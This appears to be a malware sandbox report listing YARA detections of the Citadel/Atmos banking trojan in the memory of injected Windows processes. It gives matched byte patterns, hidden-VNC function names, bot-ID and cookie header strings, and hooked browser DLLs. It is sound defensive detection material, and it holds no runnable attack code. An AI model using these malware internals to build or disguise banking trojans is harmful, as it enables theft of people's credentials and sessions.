27.3.backgroundTaskHost.exe.e20000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
8.0.StartMenuExperienceHost.exe.b50000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
8.0.StartMenuExperienceHost.exe.b50000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
8.0.StartMenuExperienceHost.exe.b50000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
8.0.StartMenuExperienceHost.exe.b50000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
8.0.StartMenuExperienceHost.exe.b50000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
21.0.RuntimeBroker.exe.190000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
21.0.RuntimeBroker.exe.190000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
21.0.RuntimeBroker.exe.190000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
21.0.RuntimeBroker.exe.190000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 19 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 19 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 19 00
21.0.RuntimeBroker.exe.190000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
9.0.RuntimeBroker.exe.110000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
9.0.RuntimeBroker.exe.110000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
9.0.RuntimeBroker.exe.110000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
9.0.RuntimeBroker.exe.110000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 11 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 11 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 11 00
9.0.RuntimeBroker.exe.110000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
1.2.nyheukpo.exe.400000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
1.2.nyheukpo.exe.400000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
1.2.nyheukpo.exe.400000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
1.2.nyheukpo.exe.400000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
1.2.nyheukpo.exe.400000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
29.0.RuntimeBroker.exe.ee0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
29.0.RuntimeBroker.exe.ee0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
29.0.RuntimeBroker.exe.ee0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
29.0.RuntimeBroker.exe.ee0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 EE 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 EE 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 EE 00
29.0.RuntimeBroker.exe.ee0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
0.3.services.png.exe.2590000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
20.0.WinStore.App.exe.a10000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
20.0.WinStore.App.exe.a10000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
20.0.WinStore.App.exe.a10000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
20.0.WinStore.App.exe.a10000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A1 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 A1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A1 00
20.0.WinStore.App.exe.a10000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
1.3.nyheukpo.exe.40fb2d4.5.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
1.3.nyheukpo.exe.40fb2d4.5.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
1.3.nyheukpo.exe.40fb2d4.5.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9cd4:$c: %BOTID% 0x9cdc:$d: %BOTNET% 0x9df0:$f: bc_remove 0x9dfc:$g: bc_add 0x8af4:$ggurl: http://www.google.com/webhp
6.3.explorer.exe.c350000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
6.3.explorer.exe.c350000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
6.3.explorer.exe.c350000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
6.3.explorer.exe.c350000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
5.0.ctfmon.exe.a50000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
5.0.ctfmon.exe.a50000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
5.0.ctfmon.exe.a50000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
5.0.ctfmon.exe.a50000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A5 00
5.0.ctfmon.exe.a50000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
4.3.svchost.exe.9a0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
4.3.svchost.exe.9a0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
4.3.svchost.exe.9a0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
